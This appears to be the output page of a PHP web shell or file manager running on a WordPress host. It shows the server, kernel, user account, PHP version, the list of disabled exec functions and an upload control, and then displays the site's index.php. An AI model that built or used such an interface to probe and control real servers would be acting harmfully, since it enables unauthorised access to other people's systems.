HEX
Server: LiteSpeed
System: Linux 37-27-227-5.cprapid.com 5.14.0-284.30.1.el9.tuxcare.els9.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jan 10 17:34:05 UTC 2025 x86_64
User: orthoclass (1965)
PHP: 8.2.28
Disabled: show_source, system, shell_exec, passthru, exec, popen, proc_open
Upload Files
File: /home/orthoclass/public_html/index.php
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 require __DIR__ . '/wp-admin/wp-admin.php';
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads WordPress Environment and Template FIRST */
require __DIR__ . '/wp-blog-header.php';